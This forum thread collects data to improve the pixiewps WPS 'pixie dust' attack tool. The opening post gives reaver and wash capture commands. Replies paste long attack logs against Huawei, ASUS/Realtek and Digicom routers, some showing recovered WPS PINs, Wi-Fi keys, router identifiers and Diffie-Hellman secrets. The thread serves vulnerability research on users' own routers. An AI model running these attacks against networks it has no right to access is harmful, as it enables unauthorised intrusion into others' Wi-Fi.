Results 1 to 17 of 17

Thread: Data gathering for pixiewps (pixie dust attack)

  1. #1

    Data gathering for pixiewps (pixie dust attack)

    Hi everyone,
    we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:
    1. The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    2. A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
    3. 2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
    4. The data should be filtered with logfilter.py
    5. Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
    6. DO NOT use -S (--dh-small)
    7. Which data we want? See below:

    • Realtek that pixiewps can't pwn (some RTL8671 ?)
    • Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)

    The latest pixiewps uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

    To collect data you can use something like this (be sure to use the correct pin):
    Code:
    sudo -i
    reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
    cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
    wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON
    You can also copy and paste the full logs if you have problems following this procedure.

    Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

    Why collecting data again after all this time?
    Pixiewps has improved overtime, now it's more mature and so is Reaver. But there are still potential vulnerable devices out there and margins for improvement overall.

    Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread, the others are too much clogged up. Hope mods don't mind
    Last edited by wiire; 2017-12-24 at 18:13. Reason: fixed example commands

  2. #2
    Join Date
    2017-Nov
    Location
    Russia, Moscow
    Posts
    1
    Quote Originally Posted by wiire View Post
    The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    Is it ok to post the data from latest Router Scan nightly build? Here's one for example:

    Huawei HG8245H (device #1)

    Code:
    [*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
    [*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
    [*] PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C531E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB95590030D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8CFDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D41581400691D39772CF1B150D6B907279CF
    [*] Manufacturer: Huawei
    [*] Model Name: Huawei
    [*] Model Number: HG8245H
    [*] Serial Number: 39
    [*] Device Name: HuaweiONT
    [*] PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E077696DEAAF152C485E09F733445191D6D44A22187F241F2B3A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C929843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB6466055EF38B630E937717060AEAD79EC59EF
    [*] AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA49CF0298E19CD4E
    [*] E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6F5B0845C97A58E
    [*] E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B878221465A82B42E
    [*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
    [*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
    [*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
    
    [*] Audit started at 2017.11.22 22:06:40 (UTC+03:00).
    [*] E-Nonce: C240EB3DAC82A15C913C893D9FACEF42
    [*] PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3FDA81D41E4501FA99641D8D4865DA72709FCC66762769826793F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A41085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C06DECEC4AD341FEF9C350D37935FF89690
    [*] PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2BD7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D18120B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D030E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BFE9E8CC6BCEC215B7D2D6C57BF396BAF321
    [*] AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629AA741C8AB89088
    [*] E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E8AB0EE54DD3BC9
    [*] E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB82296AB686782B5
    [*] E-S1: 0715E717B90532588D2448049FE0D744
    [*] E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450
    [*] Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).
    Last edited by binarymaster; 2017-11-22 at 21:11.
    by Stas'M

  3. #3
    Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data

    Sorry I haven't replied sooner, I had problems logging in on the forum.

    @everyone
    If you have troubles following the instructions, just copy and past the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

  4. #4
    ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU
    Realtek that pixiewps can't pwn (some RTL8671 ?)
    Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    2 datasets below
    Code:
    [*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000497B000030CF00003B58000042CB
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
    [*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
    [*] Received WPS Message M3.
    [*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
    [*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00001003000015AE000015B700005776
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000139000001AF4000016B300003383
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    
    [+] Key: 1234567890
    
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:10 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    
    [-] Request timed out.
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000079F70000103D000030B600007DEC
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD73558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7AF8945CF95848857CEF2F6C663C55218F4
    [*] AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD912ED1B5002BE9
    [*] Received WPS Message M3.
    [*] E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27C640A532207941
    [*] E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFBB92E9775480771
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007EB90000327A00000A9800002491
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 00000246000037BF00000B940000009E
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:30 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000071E400005D9D000073000000066A
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C65D828DBF685873C99025D565175023D142F5B73BEB807D16301853DE3B1E0427DF213B7A44820D1748576B2154620932B383142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F49F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5772699BEB04E0569229128CDD918F34B47
    [*] AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45651B7D1991CAEE
    [*] Received WPS Message M3.
    [*] E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB1938CD5A11AC5AF1F
    [*] E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC8996B91DC6A1CCFB
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007DBF00000A6400004ED900006529
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000014B00000FA900004FD500004136
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1[*] Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).
    Last edited by ForumKali2016; 2017-12-05 at 17:56.

  5. #5
    @ForumKali2016 Thank you very much!

    The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

    Code:
    0000497b 000030cf 00003b58 000042cb
    00001003 000015ae 000015b7 00005776
    00001390 00001af4 000016b3 00003383
    
    000079f7 0000103d 000030b6 00007dec
    00007eb9 0000327a 00000a98 00002491
    00000246 000037bf 00000b94 0000009e
    
    000071e4 00005d9d 00007300 0000066a
    00007dbf 00000a64 00004ed9 00006529
    0000014b 00000fa9 00004fd5 00004136
    Here's what you could do :
    - collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (ie with a script, I'm sure @binarymaster would help)
    - record the exact date and time of the router when you start the whole process
    - check if NTP is enabled and if the router has the correct date and time set

    That would help a lot. Thank you again!
    Last edited by wiire; 2017-12-06 at 00:49.

  6. #6
    new datasets - untouched output from fresh kali distro terminal
    http://www43.zippyshare.com/v/oioRqXdZ/file.html
    Reaver started just at 18:44:00 GMT+2 08.12.2017 by router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less, i tried restart reaver so fast as i can, but some miss clicks presents.

  7. #7
    OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.

  8. #8
    Join Date
    2016-Mar
    Posts
    5
    Are you looking for only devices that are unknown to be vulnerable or all devices?

  9. #9
    Join Date
    2016-Dec
    Location
    Canada
    Posts
    326
    I have all data copied and pasted into my terminal but then is says .28 milsecs to find wps pin. No pin found. Am I supposed to type some extra info. My router is a wifi robin?aka wifi robber. Is the strings supposed to have dashes or in brackets. Thank you wiire!! Have included essid.

  10. #10
    Join Date
    2018-Feb
    Posts
    1
    I usually run reaver -i wlan0 -b BSSID -c 1 -vv -K 1 -f -N, which I found that is able to quickly works on vulnerable routers (Ralink and Realtek).

    Today I test it on another Ralink router and after a while pixiewps, after telling me "WPS pin not found!" it told me "Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps"

    So here I am.
    My environment:

    Reaver v1.6.4-git-17-g6833d00 - Pixiewps 1.4.2 both from the latest commits on Github.
    Alfa AUS036NHA - Atheros Communications, Inc. AR9271 802.11n

    I read the instructions, but I still don't know the PIN code, so I however collected logs files.

    I don't want to publicly share these logs, there is a way to send you a PM? I am also on Github, but also there I don't see a way to send you a PM. Let me know.

  11. #11
    Join Date
    2018-Apr
    Posts
    2
    reaver -i wlan0mon -b F4:3E:61:89:44:EB -c 1 -vvv -K 3

    Reaver v1.6.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching wlan0mon to channel 1
    [+] Waiting for beacon from F4:3E:61:89:44:EB
    [+] Received beacon from F4:3E:61:89:44:EB
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with F4:3E:61:89:44:EB (ESSID: Digicom)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
    WPS: Enrollee MAC Address f4:3e:61:89:44:eb
    WPS: Enrollee Nonce - hexdump(len=16): 00 00 67 ea 00 00 7a 02 00 00 00 48 00 00 7d 4c
    WPS: Enrollee Authentication Type flags 0x27
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=64):
    52 65 61 6c 74 65 6b 20 53 65 6d 69 63 6f 6e 64 Realtek Semicond
    75 63 74 6f 72 20 43 6f 72 70 2e 00 00 00 00 00 uctor Corp._____
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Model Name - hexdump_ascii(len=32):
    52 54 4c 38 36 37 31 00 00 00 00 00 00 00 00 00 RTL8671_________
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Model Number - hexdump_ascii(len=32):
    45 56 2d 32 30 30 36 2d 30 37 2d 32 37 00 00 00 EV-2006-07-27___
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Serial Number - hexdump_ascii(len=32):
    31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 00 123456789012347_
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=32):
    41 44 53 4c 20 52 6f 75 74 65 72 2f 4d 6f 64 65 ADSL Router/Mode
    6d 20 49 47 44 00 00 00 00 00 00 00 00 00 00 00 m IGD___________
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 90 37 ce 11 e5 3c 1c 4f ca ed 90 68 c4 35 a1 7c
    WPS: UUID-R - hexdump(len=16): 27 3d a8 4f b2 bd 56 44 50 d0 38 3a cf af 13 a8
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
    DH: public value - hexdump(len=192): db eb 5b 1f b9 9f c3 60 6e 38 b9 05 e7 72 08 e0 e3 07 36 63 26 de 5f ef b5 23 04 09 a0 46 51 4e 91 61 6d 99 da ed f7 ea c2 94 1c b2 7e c9 d1 0a 21 94 f2 da 31 01 72 a1 bb b8 19 a6 27 44 c1 2f 13 4c ad 1c d8 98 62 87 74 2d 7f 1f d7 f6 69 ba ff 8e 58 c5 69 09 d4 5f e8 56 93 60 c9 7d 53 3f ab c1 58 95 d3 7a 37 2d 7b f5 95 ba 90 08 45 4c 89 dc a2 7e 8e 33 b2 87 31 c4 00 ff 4d 7d 33 c2 ef 85 b6 61 ec 04 fe 0f 48 8f c4 54 aa 1b 1d 5b 3b 6f ae e7 c0 46 2f ed 9d 9a 1c 20 67 76 47 36 b0 8f 8b 20 70 96 25 56 51 bf d3 c9 6d ba cf 6f 21 5a c3 c2 ea 5b 6a 79 5f 4f da 70 b5 7a ac 8f
    WPS: DH Private Key - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
    WPS: DH own Public Key - hexdump(len=192): db eb 5b 1f b9 9f c3 60 6e 38 b9 05 e7 72 08 e0 e3 07 36 63 26 de 5f ef b5 23 04 09 a0 46 51 4e 91 61 6d 99 da ed f7 ea c2 94 1c b2 7e c9 d1 0a 21 94 f2 da 31 01 72 a1 bb b8 19 a6 27 44 c1 2f 13 4c ad 1c d8 98 62 87 74 2d 7f 1f d7 f6 69 ba ff 8e 58 c5 69 09 d4 5f e8 56 93 60 c9 7d 53 3f ab c1 58 95 d3 7a 37 2d 7b f5 95 ba 90 08 45 4c 89 dc a2 7e 8e 33 b2 87 31 c4 00 ff 4d 7d 33 c2 ef 85 b6 61 ec 04 fe 0f 48 8f c4 54 aa 1b 1d 5b 3b 6f ae e7 c0 46 2f ed 9d 9a 1c 20 67 76 47 36 b0 8f 8b 20 70 96 25 56 51 bf d3 c9 6d ba cf 6f 21 5a c3 c2 ea 5b 6a 79 5f 4f da 70 b5 7a ac 8f
    WPS: DH Private Key - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
    WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH: shared key - hexdump(len=192): 21 04 3f b4 9d 84 b2 d5 96 d7 aa 36 73 db 5b c0 5e 79 e6 de f2 97 18 10 0e f6 64 0d a8 e7 31 0f 15 32 3a 97 c7 86 e9 6e 51 5c f6 dc e3 78 16 d6 0e 18 55 f7 dc bb 57 4f 24 98 9e 22 0b d8 70 8b 3a f6 ac 3d b9 cd 6d fa bc d8 64 be c6 19 b2 18 ae d0 43 74 d6 c5 0e 79 9b 54 00 39 a7 5a dc dc 6e de cb dc 00 d0 38 38 74 7b 33 52 2a f9 06 fa 5f 3d 6f 37 56 35 76 d3 3d c1 01 98 9e 4c bd 63 b8 0f e4 7c ef 26 f5 82 88 95 4e 9a f8 ae ef ff 4d dc 24 5b 43 e8 e9 59 04 9d 3e d2 cd bb a2 8a 94 ad b8 7f 5c 8f 4b 92 c3 19 a1 80 95 fb b8 c4 5c aa 24 05 ec ae e9 5a 08 03 4a a8 43 35 31 07
    WPS: DH shared key - hexdump(len=192): 21 04 3f b4 9d 84 b2 d5 96 d7 aa 36 73 db 5b c0 5e 79 e6 de f2 97 18 10 0e f6 64 0d a8 e7 31 0f 15 32 3a 97 c7 86 e9 6e 51 5c f6 dc e3 78 16 d6 0e 18 55 f7 dc bb 57 4f 24 98 9e 22 0b d8 70 8b 3a f6 ac 3d b9 cd 6d fa bc d8 64 be c6 19 b2 18 ae d0 43 74 d6 c5 0e 79 9b 54 00 39 a7 5a dc dc 6e de cb dc 00 d0 38 38 74 7b 33 52 2a f9 06 fa 5f 3d 6f 37 56 35 76 d3 3d c1 01 98 9e 4c bd 63 b8 0f e4 7c ef 26 f5 82 88 95 4e 9a f8 ae ef ff 4d dc 24 5b 43 e8 e9 59 04 9d 3e d2 cd bb a2 8a 94 ad b8 7f 5c 8f 4b 92 c3 19 a1 80 95 fb b8 c4 5c aa 24 05 ec ae e9 5a 08 03 4a a8 43 35 31 07
    WPS: DHKey - hexdump(len=32): c6 43 ba d8 20 89 9e 53 cb 45 62 b5 b6 95 14 46 3f b4 96 84 6f 50 4f 5f 9e 8d 7c 3f fc 69 a9 7c
    WPS: KDK - hexdump(len=32): 9f 46 9a 59 68 64 8b e2 3e 29 92 27 51 c5 41 48 82 99 b6 a3 ca bb 16 7c 70 97 fb 51 f9 67 a8 e0
    WPS: AuthKey - hexdump(len=32): 0e 56 92 3c fa 30 43 ef 25 a8 24 3a 45 5c 23 dc ec d0 75 b5 60 87 e6 88 76 90 4a 98 9f 12 d2 30
    WPS: KeyWrapKey - hexdump(len=16): 68 bf aa 33 1f 2e d6 85 c9 28 7b de d2 18 3c 3b
